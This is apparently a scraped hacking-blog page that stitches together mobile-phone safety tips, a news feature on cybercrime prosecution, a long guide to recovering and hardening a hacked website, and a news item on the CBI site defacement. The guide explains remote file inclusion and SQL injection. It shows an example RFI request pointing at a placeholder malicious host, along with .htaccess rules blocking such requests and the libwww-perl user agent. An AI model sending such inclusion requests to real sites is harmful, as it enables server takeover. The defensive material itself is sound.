On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet
Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login
Please do not click photographs without permission by your mobile phones. You are invading the privacy.
Do not send obscene/pornographic text, images. SMS.
Do not send obscene/pornographic text, MMS (multimedia messaging service)
Do not receive from or reply to sms/mms of strangers.
Do not transmit obscene/ pornographic material, as it is an offence under Information Technology act –2000.punishment is 5 yrs imprisonment and 1lac rupees fine.
Do not call to the unknown phone/mobile numbers you get while chatting or exhibited on various profiles on Internet. Which you are not familiar with. If you do you may be causing harassment on behalf of other person.
Do not keep your Blue tooth open to all, you may receive obscene/phornographic text, images and viruses.
Do not give your mobile numbers while chatting on INTERNET to avoid “STALKING”.
DO not handover your mobile phone to unauthorised service center, to avoid CLONING.
Do’s
Note down your IMEI number.
Security pin code should be used to avoid misuse of your mobile phones.
mms/sms received should be checked before opening the message.
Delete obscene/phornographic text, images. SMS/MMS.from your mobile phones.
Anti-virus software should be loaded in the mobile phone.
Mobile phone keypad should be locked after every use.
Hii! This is Pc Hackers Guru Know Many about Hacking Though law enforcement has come a long way in fighting e-crime, its efforts are still only scratching the surface and businesses are learning they must build cases against culprits themselves, says Ron Condon.
One big attraction for anyone getting into cyber crime is the slim chance of getting caught or punished. Many big companies that fall victim, notably the banks, often choose to sweep the event under the carpet rather than face the shame of admitting they have been hacked.
If they catch the culprit, they are likely to let him go free in exchange for keeping his mouth shut. If crimes are reported to the police, they have little chance of being successfully prosecuted. Law enforcement has much higher priorities, and its resources for chasing computer crime are limited.
Most successful prosecutions result from a large company putting in its own resources.
John Lyons, formerly of the UK's National Hi-Tech Crime Unit, and now a security consultant, says: "Law enforcement is only able to take on the top three per cent or four per cent of the most serious crimes." And with jurisdiction limited by national borders, their ability to pursue overseas criminals often depends on personal contacts in foreign police forces, rather than any formalised system for sharing information.
But with organised criminal gangs making greater use of the internet to commit offences and launder the proceeds, there is a growing recognition that if we do not take action against them, they will make the internet unusable for legitimate users.
In a paper delivered in March last year to the United Nations Congress on Crime Prevention and Criminal Justice, Scott Charney, Microsoft's head of trustworthy computing, outlined the argument for a joint response from law enforcement and private industry.
The problem for traditional law enforcement in tackling cyber crime is, Charney said, the sheer scale and international nature of the task. "The government cannot be primarily responsible for defending against attacks in the virtual world," he said. "The potential avenues for abuse and the number of potential attackers are simply too many and too hard to identify."
On the other hand, private companies do not have the authority to act alone. He therefore proposed a joint approach with both sides playing an active role and co-operating at a number of levels.
The Botnet Task Force, which held its fourth meeting in Lyon, France, this month is a good example of the joint approach. Initiated by Microsoft in 2004, it now has the support of Interpol and acts as a means of building awareness and providing training for law enforcement.
The private-public approach to law enforcement is already taking hold at grassroots levels too, as companies realise they must take prime responsibility for gathering evidence.
Dave Jevans, who heads the US-based Anti-Phishing Working Group, says: "The main glimmer of hope is that the banks have realised they need to do something. Most successful prosecutions result from a large company putting in its own resources - for instance, a team of lawyers and IT guys and investigators - who liaise with law enforcement to make it happen. They find the names and addresses, and they track where the money goes, and they present the evidence to make a case. But there is only a handful of companies that can afford to do something like that."
Lyons says any company suspecting it is the victim of cyber crime should contact the police and work with them to agree a way forward. The police can advise on what evidence to gather and then the company can use its own investigators. "In this way, the police take an advisory role and you do the legwork yourself," he says.
Private investigation companies have the advantage of working across national boundaries, which can be useful, for instance, when following money stolen in phishing scams.
Alan Brill, managing director of Kroll Technology Services, says his agents work closely with local law enforcement and follow the same standards of evidence as the police themselves. "The police do a great job with limited resources and budget but they can only handle the really serious criminal activity," he says. "But with the FBI, state and local police involved, it can take weeks or months before they can handle the evidence you've assembled."
He counsels getting trained forensic investigators involved immediately, so they can take an image of infected machines. "You don't get a second chance to take a first look," says Brill, adding that he has had cases of lawyers powering up a machine and losing vital evidence. "You need to get the data imaged, and then you can start making decisions, and give yourself more options."
In another current case being handled by Verisign Security services on behalf of a UK bank, the company had to investigate fraudulent transactions carried out by workers at the bank's offshore call centre. A company spokesperson explains: "We did the forensics, all the process diagrams and put together the case material. We showed what went wrong, we got the money back and changed processes to make sure it didn't happen again." The evidence is now with local police for prosecution.
And yet, despite this activity, we still seem to be scratching the surface of internet crime. Earlier this month, the US Federal Trade Commission joined forces with 30 other countries in the OECD to propose international efforts to combat spam. This advocates greater co-operation between countries in investigations and prosecution.
How they hope to make that work is less clear. The US CAN-Spam Act has been roundly condemned as being ineffective and even encouraging the growth of spam, while EU legislation requires consumers to opt-in before they can receive direct email.
Without more agreement by the legislators, it looks as if the private efforts of organisations such as Spamhaus and the legal muscle of big ISPs are more likely to make a dent in the activities of the cyber criminals than the work of law enforcement.
Security Advisories Just keeping up to date has not always been enough to keep osCommerce secure. The osCommerce forum has additional security advice for Version 2.x and Version 3.x
8) Examine your own PHP or ASP.NET code for security holes
The "What is a website hack?" article (top of this page) has more information about the following three most common exploits of custom code, and some others:
Remote File Inclusion (RFI), Local File Inclusion (LFI)
The following PHP functions: include($variable);
require($variable);
include_once($variable);
require_once($variable);
can be tricked into fetching a malicious script from a remote server and running it as part of the currently executing script if the value of $variable came from an HTTP query string or other user-supplied input and if the value supplied is a URL (web address) rather than the value that the programmer expected.
They can be tricked into divulging the contents of password or other sensitive files if the supplied value of $variable is a local file path on the server.
SQL Injection
When an HTTP query string, or any other data from the outside such as input to a search box, is used in the building of an SQL database command string, maliciously crafted input can corrupt the SQL command, causing it to inject content into database tables or list the contents of the database (such as user names and passwords) on the output page. A widespread attack that used SQL injection was called ASPROX.
If you suspect that a script you wrote yourself might be the security weakness, it is safest to stop using that script until you can examine it carefully. After making a local copy for yourself, delete the script from the server. Removing the links to it isn't enough. As long as the script is on the server, anyone who already knows its name can still access and exploit it. If you leave it on the server, at least rename it.
9) Find and repair all the malicious changes that were made
Now that you have discovered where the security weakness was, and fixed it, it is now safe to repair your website's content, because the attackers won't be able to damage it again.
As described in the "What is a website hack?" article (top of this page), after someone has gained access to your site, they can change anything they want and can do an extraordinary amount of damage. In order of most to least common:
Alter .html, .php, and other text web pages, usually to inject iframes, JavaScript, links, PHP, or other malicious code.
Modify database tables, usually to inject the same types of content listed above, so it will appear on your pages.
Add new files.
Add executable programs to let the attackers "manage" your website files remotely, grant them access even after you clean up (back doors), send spam, connect to IRC servers for botnet communications, mass-attack other websites, etc.
Subvert the operating system, putting the entire server under the control of a remote operator.
However, they rarely do all those things because a server so massively compromised would be quickly noticed, and they don't want that. Usually, they do the first or second item and possibly the third, meaning that you will probably have to clean up malicious changes in your website files or database tables, and look for new files that shouldn't be there. Two "clean sweep" shortcuts: replace entire website from known-good backups
Steps 9a) to 9d) describe ways to locate and repair files that have been maliciously altered, which can be a time-consuming and painstaking chore, especially if you're not comfortable working with HTML code.
In some cases, it can save time to simply replace everything that might have been damaged with fresh copies that you know are clean. However, doing this destroys the evidence you might need for determining how the attack occurred and how to prevent it happening again. Therefore, before doing this, you should already have a clear idea why the attack succeeded, or should make a copy of the hacked site so you can study it later:
Less drastic - replace contents of public_html: If you are thoroughly familiar with what is in your public_html folder and you are certain this method won't destroy irreplaceable files, you can use cPanel > File Manager or FTP to delete all the files and folders inside /public_html (but don't delete the public_html folder itself) and republish the entire site from a known-good backup.
It will still be a good idea to look for damaged files or malicious new ones in your root directory (/) and its other subdirectories other than public_html.
More drastic - reprovision: To really start fresh at a shared host, you can ask the host to "reprovision" your account, to recreate it as though it is brand new. You lose your historical logs and stats and must build the site up from nothing. I recommend against this unless all other options have failed.
If you have published your site from known-good backups, you can skip a ton of trouble and go to Step 10)!
9a) Get a complete listing of all the files in your website
These sections (9abc) describe three ways to view a list of all the files in your website: shell command (cron), FTP, and cPanel File Manager.
Linux "cron" allows you to run a shell command that emails to you a complete listing of all the files in your site, showing for each the name, timestamp, size, owner, and all the permissions settings. This is by far the best method. It is described fully in a separate article that also explains Linux file and folder permissions.
How to use the directory listing:
It is ideal if you have a similar list that you made previously when the site was clean. You can compare the two to find files that have changed size, files whose timestamps or permissions are not what they should be, and new files that shouldn't be there.
If you don't have a known-good list to compare against, you can still review the new list for files that seem out of place or have wrong ownership or permissions. This will be discussed below.
9b) Examine your site's files in cPanel > File Manager
FileManager allows you to easily review filenames and permissions, but it doesn't show any other information about the files, and navigating up and down the directory tree is a tedious process. File and folder permissions are shown numerically. The article linked above at "Get a complete listing" describes how to translate between numeric "755" and "rwx" notation.
9c) Examine your site's files using FTP
In an FTP view of your website, the folders and files look like what you are used to in Windows Explorer, with a navigational directory tree pane on the left and a folder contents pane on the right. FTP view is easy to navigate, and it allows sorting on the Date Modified column to easily spot recently changed files. If you are unfamiliar with viewing your site by FTP, this article describes how to use Windows Explorer for that, and it has a link to a free Firefox plugin (FireFTP) that does it better.
9d) What to look for in the list of files
Pages with modified dates more recent than you last saved the page yourself. Inspect each modified page to see if code has been added to it. Malicious changes to your displayable website pages often take the form of invisible iframes or "obfuscated" JavaScript. A separate article, what to do when Google flags your website with a "This site may harm your computer" warning, describes how to locate and identify malicious iframes and JavaScript, with examples. It also describes how the domain name referenced in the iframe can help discover the method by which your website was hacked.
If malicious JavaScript or iframes were added to your pages, the intent of the attack was probably to launch browser exploits against your site's visitors.
New files with obviously suspicious names. Some hacks install files with names like hacked.html or vulnerable.php, etc. Others might have nonsensical names or names consisting of random character strings. Some might be in locations that make them suspicious, like a .php file in your /images folder. If you find a file that was definitely installed by the attack, search for other files that have almost the exact same timestamp.
Files you don't recognize. Determine whether each one is malicious or not. You can examine plain text PHP (.php) or Perl (.pl) scripts in a text editor.
Unfortunately, you cannot simply delete all the files that aren't yours. Some are required system files that you just never noticed before. When in doubt, do a web search on the filename or post a question in a forum. Research the names of unfamiliar CGI programs, since they cannot be examined visually.
If an exploit modified files on your server but didn't affect your displayable pages, it suggests that your site visitors weren't the target of the attack. Instead, it might have been trying to turn your site into a spam emailer or into a robot crawler to attack other sites, or to install on your site a library of malicious scripts or other content to be called by injected iframes or RFI attacks on other websites.
Check your root directory ("/") and its subdirectories for malicious or altered files. Even if you delete the contents of your public_html and republish the site from scratch, that doesn't overwrite your folders above public_html, so you must check those manually.
9e) Search your website files for suspicious changes
This PHP script can help search your website for suspicious filenames, for suspicious code, and for other suspicious text.
10) Check that your file and folder permissions are secure
Using the complete file list you made, make sure file and folder permissions are what they should be. Although your complete file list is a text file, the search isn't too difficult. You can search for suspicious "world-writable" 777 folder permissions by searching for the equivalent "rwxrwxrwx" in the text. World-writable 666 file permissions appear in the text as "rw-rw-rw-".
Common correct permissions for world-readable (but not world-writable) folders are 755 (rwxr-xr-x), and common permissions for world-readable files are 644 (rw-r--r--). Those are what you should mostly expect to see.
There are only two situations where world needs write access (777 / 666), and both only apply if your server is configured with PHP as an Apache module:
A file needs 666 permissions if PHP needs to a) open the file and write data into it, or b) copy another file to the directory entry currently occupied by this file.
A folder needs 777 permissions if PHP needs to a) dynamically create new files in it, or b) delete existing files from it. However, if PHP only needs to open and modify the contents of an existing file or even copy another file to the directory slot occupied by an existing file, the folder does not need 777 permissions. It is only necessary that the destination file have 666 permissions. That is counterintuitive because you would think that copying a file involves deleting the existing file and putting the new file where it was, but that is not how Linux views it. It only considers it a change in the file's content, not a change to the directory, so the directory can remain read-only. This is important because there may be some files that PHP only needs to create once, during a program's initial installation when it's setting up its data files. After that, it's possible PHP can do everything it needs with the file set to 666 but the directory locked back down to read-only 755. That is much better because although that one file remains potentially vulnerable to modification, a hacker cannot put new malicious files in a 755 directory.
If you find world-writable permissions on a file or folder, consider it potentially suspicious because those are areas the hacker could have accessed most easily:
Check the contents of 777 folders to ensure they don't contain malicious new files.
Check the contents of 666 files to ensure they don't contain new malicious code.
If you can't think of a good reason why the loose permissions are necessary (does PHP really need to make the changes those permissions allow?), try tightening them to 755 / 644.
Even if you do know why the loose permissions are necessary, try to think of a way to make those permissions unnecessary.
11) Change all your passwords again
In case someone was "watching" inside your site while you did it the first time, do it again now that you know the site is clean.
12) Try to identify the IP address that attacked you
This is not to hunt down the attacker, which is usually pointless (most are robots, and there are millions of them). Rather, the IP address helps find other important information about the attack.
If you can identify their IP address, you will be able to search all your logs for all the places where that IP address appears. That will help identify what weak part of your site was attacked, how it was attacked, and what malicious actions were performed.
Stats programs like Analog, Webalizer, or AWStats won't be much help because they generate aggregated summary statistics. You need the details about individual page requests. cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It's a good place to go when you first discover the problem, but it's only a start. The raw log text files are a better source of information.
a) If you have never used your site's raw access logs before, get a program to unzip .gz files:
Your website's raw access logs are stored and sent to you as gzipped files. One program that will easily extract .gz files is 7-Zip. It is a command line utility that you run from a "Command Prompt" (aka "DOS box").
b) Get your logs from cPanel > Raw Log Manager
The log file location in Plesk has a similar name. If you don't have cPanel, Plesk, or a comparable control panel, you can usually get the logs by FTP, usually from a folder outside public_html, with "logs" or "access logs" in its name. Some shared webhosts don't provide access logs, or they charge an extra fee for them.
Go to cPanel > Raw Log Manager. If you don't see a log file there, try cPanel > Raw Access Logs. That is a holding file where your data is stored until the server does its daily statistics processing, after which the data file is transferred to Raw Log Manager.
Click the name of the file you want to download.
At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:\TEMP works well.
Open a Command Prompt:
Start > All Programs > Accessories > Command Prompt, or
Start > Run > cmd.exe
Go to the folder where you saved the .gz file: cd \TEMP
Type the command line to extract the .gz file: 7za.exe x filename.gz
You should get a report that says "Everything is Ok".
I usually delete the .gz file and rename the output file to .log.
The unzipped log files can be extremely large. In Windows, WordPad can handle up to about 12MB. For easier viewing, set the font to a monospaced font like Courier New, with word wrap Off. Notepad++ can handle files of 100MB or more. In Linux, the gedit editor capacity seems almost unlimited.
If you are comfortable using Microsoft Access, the Webstats.mdb database has tables into which you can import your log files.
The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
Go through the logs carefully, looking for suspicious activity in the days before the attack occurred, and keep monitoring your logs in case the hackers come back, which they often do. Your HTTP log shows the visits to your site by HTTP, the request method normally used by ordinary visitors (using their browsers), robots, and hackers.
It's not always easy to determine which lines in an HTTP log are suspicious and which ones aren't. At my hack attempt identifier online calculator, you can paste lines from your HTTP log to find out which ones are hack attempts. It classifies the attempts by type so you can see what ways your site is being attacked, and it explains how the different types of attack work.
If you find suspicious changes made to your site (such as file timestamps that are not from when you changed the files yourself), you can try to correlate those changes with the suspicious entries in your log.
For example, a hacked file's timestamp will often show when the hack occurred (unless the hacker made a special effort not to change the timestamp). If your HTTP log shows a malicious request at the moment of the changed file's timestamp, that is very suspicious.
It could indicate that the file requested by the hack attempt had a security vulnerability that the hacker was able to exploit with their request. The exploitable file does not have to be the same file that was modified. The exploitable file is just the doorway to get at the other files. In this case, you would examine the requested file (not the modified file) for possible security vulnerabilities. This is how your logs can help identify how a hacker got in.
As another example, if you use a database, and if SQL injection attacks are the only type of hack attempt your site ever receives, SQL Injection becomes your primary suspect. Your FTP log shows FTP accesses to your site. FTP stands for File Transfer Protocol. In contrast to HTTP, which is most often used to request files for viewing, FTP is a method of transferring files both to and from your server. It's normally used only by you, the site administrator, but if malicious people or robots manage to log into your FTP as you, they can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users. Make sure the timestamps match times you were logged in and doing transfers.
There is reference information about FTP log file format at Apple Developer Connection.
I've seen reports of numerous instances where a webhost spotted in an FTP log a transfer from an IP address other than that of the site owner and immediately informed the owner that their password had been stolen. In too many of these instances, the surrounding circumstances make the webhost's claim unbelievable. Here is an alternative explanation:
PHP scripts called by RFI attacks sometimes use PHP's FTP file transfer functions to download additional malicious scripts and related files from a remote server so it can run or install them. The initial RFI includes the remote script into a legitimate script on the victim server, at which point it becomes a part of that script. The script then initiates an FTP transfer, which is recorded in the FTP log. The server does not show its own IP address in the FTP log, but rather that of the second party to the transfer, the remote website. The log of the session makes it appear as though someone logged in (which would have required the password) and initiated an FTP transfer, but in fact there never was a login. There didn't have to be one, because the session was initiated on the server, from the inside.
Remember this as a possibility if you find IP addresses other than yours in your FTP log or if your webhost tries to convince you too quickly, without considering other evidence, that your password "must have been" cracked. The danger of believing this easy story line (if it is not true) is that it can lead you to believe that all you have to do is change your password. However, if the real initiator of the FTP transfer was an RFI attack, changing your password won't help at all.
c) Use .htaccess or cPanel > Deny IP to block the hacker's HTTP access to your site
If you identified the hacker's IP address, one site where you can look it up to get more information about it is http://whois.domaintools.com/.
You can ban the IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags. deny from nnn.nnn.nnn.nnn
The nnn's are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too. The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Others ranges can only be successfully defined using "CIDR/netmask" notation. Although it looks intimidating, it's easy after the first time you do it. See the separate article describing how to calculate and use the CIDR/netmask. d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.
If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.
13) Report or go after the hacker legally?
Hacking is a violation of the terms of service for any legitimate webhost or ISP. If you can prove conclusively that someone is using a particular IP address for hacking (or spamming, too), you could report the incident to the webhost or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ the company.
However, your chances of getting anywhere with this aren't very great. Even if you succeed, it's a drop in the bucket. Although you might feel as though you are in a battle of wits with a wily adversary, it is thousands of times more likely that you were hit by an automated drive-by attack that is playing a percentage game, with malicious requests being launched against millions of websites, from hundreds of malicious servers. If one is shut down, it's just a cost of doing business for them.
It is a more worthwhile use of your time to do everything you can to protect your site from all hackers, regardless of who they are, and understand that there will be a constant flood of attacks against your site.
What to do NOW to protect your website
Website security precautions
Sections 1-5 are absolutely necessary. They do not require a lot of technical knowledge.
1) Maintain strong security on the computer that you use to manage your website
Someone who successfully infects your PC can use it to get into your website. That is very common.
On any Windows PC (does not apply to Linux, Mac) that you use to administer your website, install good quality antivirus software to keep it free of viruses and Trojan downloaders that can install spyware such as keyloggers and password-stealers. Get real-time ("on access") protection that detects malware immediately when it is received. "On-demand" scanning (such as once a day or once a week) is not good enough. Malware can do all its damage, steal your data, and even delete itself, before you get around to doing a manual file scan.
On a Windows system, once a month, while logged into your PC as an Administrator, visit Windows Update to install the latest security patches for Microsoft products, including Internet Explorer.
Keep all your internet-related software such as browsers, plug-ins, and add-ons up to date with the latest security patches. Examples are Adobe Reader, Flash, and Java. You can check whether your Firefox plugins are up to date at Mozilla Plugin Check.
Use adequate security settings in your web browser. When Internet Explorer and Firefox are first installed, their default security settings are not high enough, and most people don't change them. Set JavaScript so it is Off by default and only enabled for trusted websites that require it. Follow best practices for IE, and use the NoScript add-on in Firefox.
On a wireless network or in a public "hot spot", your data is transmitted by radio, and it is easy for someone nearby to monitor everything you send and receive that is not encrypted. Normal web browsing on http:// websites is not encrypted, and neither is a normal FTP login. Whenever you are "working wireless", use encrypted https:// to log in to your server, and use secure FTP (SFTP) to transfer files.
2) Follow accepted best practices for your website passwords
Use strong passwords: 8 to 20 random upper/lower/numeric/punctuation characters.
Use a different password in every location.
Only give your password to people who must have it.
If you give your password to someone temporarily, change it as soon as their work is finished.
Here is an entire article about why good passwords are so important. It has a strong password generator and password input boxes where you can practice typing strong passwords accurately to get used to them.
3) Choose third party scripts carefully
Don't load your website with every cool script, gadget, feature, function, and code snippet you can find on the web. Any one of them could let a hacker into your site. Before you use something new, read its vulnerability report at Secunia.com, and do a web search on it to see if people talk about it as a security hazard. Some add-ons and templates are actually designed to be malicious. Ways to avoid those are described by the Google Blogger Team in Keeping Your Blog Secure.
4) Keep third party scripts up to date
Once you have installed a script such as WordPress, SMF, Coppermine, phpBB, or any others, find a way to make sure you are notified quickly when security updates are released. Get on a mailing list, subscribe to an RSS feed, subscribe to a forum board, create a Google Alert, whatever you need to do. When a security update is released, install it within 1 day, if possible.
5) Don't weaken your server's file and folder permissions.
Each file and folder on your server has permissions settings that determine who can read or write that file, execute that program, or enter that folder. Your webhost initially created your webspace with secure permission settings on all files and folders.
Do not modify the permissions until you know what you're doing. Don't guess. One mistake can allow any other account on your shared server to put files on your site, or allow anyone in the world to put files there by first getting into a weaker website on your shared server and running a malicious PHP script from there.
People having trouble installing web applications on their site are sometimes told to try setting the Linux permissions to 777 (for folders) or 666 (for files). Those permission levels are sometimes necessary, but they are a hazard and should only be used for folders and files for which it's absolutely necessary and only during times when it's absolutely necessary. For example, sometimes 777 only needs to be used during installation or during configuration changes or software upgrades. At other times, the application might function just fine even if you change the permissions back to more secure settings. In other words, if you need to use insecure permissions, try to minimize the amount of time they are in effect. There is no reason to leave permission levels low all the time if you only need them to be that way occasionally. Also, if software installation instructions tell you to delete the installation script itself after use, remember to do it. If it's left on the server, someone else who knows it's there (or knows it should be there) can run it, just like you can.
A separate article has a short explanation of permissions settings.
6) Write your own scripts securely
These precautions are also absolutely necessary, but only if you write your own program code.
For the language you use, find and read an overview about security: PHP, ASP.NET, Cold Fusion, ...
When you use an unfamiliar function for the first time, check the manual for security considerations.
Learn to instinctively distrust data from the outside world. Write your code so that incoming malicious input can't trick it into doing something it shouldn't. Outside data includes: incoming form submission data, HTTP query strings, cookies.
Learn how to prevent "Remote File Inclusion". (#1 most common security error)
Learn how to prevent "SQL Injection". (#2 most common security error)
There are lots of online resources for learning how to code securely. All it takes is a web search.
For PHP, use a good php.ini file for extra security, to block common attacks.
7) Block suspicious activity with .htaccess
These are extra precautions that provide an additional layer of security. If you understand what this section is talking about, the discussion and code examples should help you to put some good protections in place. If you don't understand this section, don't worry about it unless you are under constant attack and other remedies have failed.
Download and examine your raw access logs, or analyze the lines here. You will most likely find attacks of the types described in my articles. Even if the attempts are unsuccessful, your logs give early warning about what methods are being used, which gives you time to figure out how to defend against them. Here are some examples of how to block suspicious activity:
Ban bad robots.
One program often misused for automated remote file inclusion attacks is called "libwww-perl". The RFI cannot succeed if your server refuses to serve the file, so blocking this commonly malicious User-Agent is one defense. Put the following lines in your public_html/.htaccess, in a part of the file that is not delimited by HTML-style tags like <tag></tag>:
SetEnvIfNoCase User-Agent libwww-perl block_bad_bots
# to deny more User-Agents, copy the line above and change
# only libwww-perl, to match the new name.
deny from env=block_bad_bots SetEnvIfNoCase does a case-insensitive test of the User-Agent against a regular expression, which in this case is "contains libwww-perl". If it matches, it sets the variable block_bad_bots. The final line says if block_bad_bots was set (i.e. if the requestor matched any of the bad robots), deny the request and send a 403 Forbidden error instead. Regardless of what the bad robot was trying to do, it won't succeed.
Ban suspicious URL query strings.
Another defense against RFI is to block all requests having the form: GET /index.php?inc=http://badsite.com/badscript.txt?
The following .htaccess code blocks any request where the query string (the part after the first question mark) contains "=http://" or "=ftp://". During times when you need to use a query string of that type yourself, you can comment out the code block or enable the exception shown:
# If the next line is already in your .htaccess, you don't need to add a 2nd one.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
# Allow yourself, for SMF Forum Package Manager upgrades.
# Set it to your own IP address so you are the only one who won't be blocked.
#RewriteCond %{REMOTE_ADDR} !^111\.222\.333\.444$ [NC]
RewriteRule .* - [F,L]
To test: you should get a 403 Forbidden error when you try to go to:
If you have coded your pages so they use remote file includes from your own site or from some external site (such that your site receives requests, constructed by you, that have URLs in the query strings), my first advice is that you should try to stop doing that:
Instead of sending your own site a request that has a URL in the query string, you can put in the query string a text string that the receiving page translates into a URL after it receives it. That way, your script can't be tricked by someone who sends it a malicious URL instead of one of the legitimate ones it expects.
If you must send your own site requests that have URLs in the query strings, you can use a more complicated .htaccess to allow your own remote file inclusion requests but ban others: # FIRST, DISALLOW QUERY STRINGS CONTAINING MORE INSTANCES OF http://
# THAN WE EVER USE OURSELVES, TO LIMIT THE NUMBER OF TESTS WE MUST DO LATER.
# THIS EXAMPLE ALLOWS ONLY INSTANCE PER QUERY STRING.
RewriteCond %{QUERY_STRING} (.*http(\:|%3A)(/|%2F)(/|%2F).*){2,} [NC]
RewriteRule .* - [F,L]
# NOW WE CAN TEST EACH INSTANCE AGAINST THE LIST OF SITES WE WANT TO ALLOW.
# SINCE THIS IS A NEW REWRITE RULE, WE MUST TEST AGAIN WHETHER IT CONTAINS http://
RewriteCond %{QUERY_STRING} http(\:|%3A)(/|%2F)(/|%2F) [NC]
# THEN FALL THROUGH TO THE BAN IF IT IS NOT ONE OF THE SITES IN OUR ALLOW LIST.
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site1\.com) [NC]
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site2\.com) [NC]
#ADD A LINE FOR EACH EXTERNAL SITE YOU WANT TO ALLOW TO APPEAR IN QUERY STRINGS.
RewriteRule .* - [F,L]
Allowing for more than one instance of http:// in your query strings is possible. It requires complex code that we can custom design for you if needed. Other query string bans:
1) Malicious RFI attempts almost always have a question mark at the end of the query string. Ban any query string that contains a question mark. The first question mark (which marks the beginning of the query string) is not part of the query string, so only question marks after the first one will trigger the ban: RewriteCond %{QUERY_STRING} (\?|%3F) [NC]
RewriteRule .* - [F,L]
2) Be creative: find other characteristics that are common in the attacks on your site but that are never present in legitimate requests. Be thorough: use every good ban rule you can think of. It is very satisfying to see an attack on your site and know that even though it only needed to trigger one ban rule to fail, there were six others in reserve that it would have triggered.
Ban IP addresses responsible for suspicious activity.
You can block IP addresses (or ranges) in .htaccess or by cPanel > Deny IP. Although such bans can be useful against IP addresses you are 100% certain will never make a legitimate request, they aren't otherwise very practical. Once a botnet starts attacking your site, the requests will come from hundreds of different IPs, and banning them all will be futile. It is much better to ban by the other characteristics of the requests.
See this forum thread for further discussion about using .htaccess to block malicious requests, links to websites with suggested .htaccess code for blocking such requests, and a basic introduction to help understand the Perl regular expressions that are used for pattern matching in .htaccess.
Preparations that will make hack diagnosis and cleanup easier
1) Always have a backup copy of your entire website and its databases
You can use FTP and/or cPanel > Backups. Keep the backup somewhere not on your server, such as on your local PC or a DVD. Even if your webhost does backups, make a separate set for yourself. Do a new backup whenever there is enough new content that you don't want to have to redo the work. Keep more than one "generation" of backups. For example, if you backup monthly, keep separate versions from 1 month ago and from 2 months ago. This guards against backing up your site after it's been infected but before you discovered it. You'll still have (hopefully) a slightly older backup that isn't infected. For the same reason, don't backup too often.
2) Turn on log archiving in cPanel now
Your raw HTTP and FTP logs are an important source of information after an attack, but the logs are normally deleted each day. Enable archiving to allow them to accumulate and preserve the evidence after an attack. Periodically download and review the logs to see what kinds of attacks are being launched against your site. As is so often the case, becoming familiar with what is normal will help you detect when something is not. Accumulated logs can take a lot of disk space, so you might want to delete old ones from the server periodically.
3) Get a complete list of your site files NOW while they are known-good
This article describes how to get a list of all the files in your website. If you do it now, it will be a baseline list of the files you can assume are supposed to be there. If your site gets damaged, the list will help you decide whether a file you don't recognize is new or is just a system file that you never noticed before.
4) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager or the complete file list you made. If you get used to what is normal, things that aren't will catch your attention.
5) Use good database connection practices in scripts:
a) Create separate MySQL users for your scripts to use
If you use your cPanel userID and password for database connections in your scripts, then changing your cPanel password will instantly break all your scripts until you recode them to use the new password.
Instead, create one or more new users, completely unrelated to your cPanel login, that your scripts can use for their database connections:
Go to cPanel > MySQL® Databases > Current Users.
In Username: enter the name of the user to create. Although the existing user names might appear as YourUserID_username, don't enter the prefix and underscore. cPanel will do that for you, if needed.
In Password: enter the password to use. Make it a strong one.
Click Create User, read the confirmation screen, and then Go Back to the MySQL Account Maintenance page.
Go to the Add Users To Your Databases section.
In the left dropdown box, select the user you just created.
In the right dropdown box, select the database you want that user to be able to connect to.
Select the Privileges you want that user to have for that database, by checking the appropriate boxes. Select only the privileges the user really needs for performing whatever tasks your scripts will do. Granting only limited privileges is a security precaution.
Click Add User To Database. Your new user now has the specified privileges, for that database only. Add the user to other databases, if needed.
Now update your scripts so they use the connection data for this new user instead of your old cPanel user. However, ...
b) Put your MySQL connection data in a well protected file
If each of your scripts has its own code block for database connection, then if you are hacked and have to change your passwords, you'll have to hunt through all your files to find every code block that needs changing.
Instead, put all your database connection code in one central location such as an include file that is well-protected from web access, and make all your scripts read it from there. There are examples and some discussion about how to do this in the User Contributed Notes at http://us.php.net/mysql_connect. You can protect your include file by putting it in a folder above public_html, or in any folder that is closed to web access by an .htaccess file, or by the other methods mentioned in the php.net Notes.
Unfortunately, none of these protection methods will keep your data safe from someone who has actually gotten into your site, but the new database connection method you have just created will make it easy to change your password (in just one place) if that does happen.
Hii! This is Pc Hackers Guru Know Many about Hacking New Delhi: In a major embarrassment, the website of the Central Bureau of Investigation (CBI) was hacked on Friday night by programmers identifying themselves as "Pakistani Cyber Army".
The home page of the CBI website had a message from the 'Pakistani Cyber Army' warning the Indian Cyber Army not to attack their websites.
The CBI website, supposed to be one of the most secure websites, is connected to the command centre of world police organisation - Interpol - 24x7.
The message from the hackers also spoke about the filtering controls provided by the National Informatics Centre (NIC), a body which mans computer servers across the country. It also claims to have hacked another 270 websites.
Intelligence agencies have been often warning the government that proper cyber security was not being ensured in government offices and that no security audit was being carried out.
The website has still not been restored. In a late night statement, the investigating agency said, "CBI is aware that its official website has been hacked and defaced. An inquiry has been launched and necessary remedial measures are underway to restore it."
Telecom Minister Kapil Sibal has said that the cyber attack on the CBI website is serious issue and that he would look into it. "These are important issues, we will look into it," Sibal said. (Watch)
